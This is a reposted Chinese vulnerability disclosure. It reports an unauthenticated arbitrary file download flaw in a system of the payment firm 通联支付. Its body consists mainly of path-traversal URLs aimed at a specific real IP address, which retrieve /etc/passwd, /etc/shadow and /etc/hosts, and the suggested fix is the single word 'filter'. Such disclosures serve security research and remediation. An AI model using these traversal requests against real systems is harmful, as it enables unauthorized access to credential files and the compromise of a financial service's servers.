神刀安全网

通联支付某系统存在任意文件下载漏洞(可读shadow)

简要描述:

任意文件下载漏洞(可读shadow)

详细说明:

通联支付某系统存在任意文件下载漏洞(可读shadow)

无需登陆可下载

code 区域
https://113.108.182.3/aiap/other/download.dsr?file=/../../../../../../../../../etc/passwd

通联支付某系统存在任意文件下载漏洞(可读shadow)

漏洞证明:

code 区域
https://113.108.182.3/aiap/other/download.dsr?file=/../../../../../../../../../etc/shadow

通联支付某系统存在任意文件下载漏洞(可读shadow)

code 区域
https://113.108.182.3/aiap/other/download.dsr?file=/../../../../../../../../../etc/hosts

通联支付某系统存在任意文件下载漏洞(可读shadow)

修复方案:

过滤

版权声明:神刀安全网转自 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 通联支付某系统存在任意文件下载漏洞(可读shadow)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮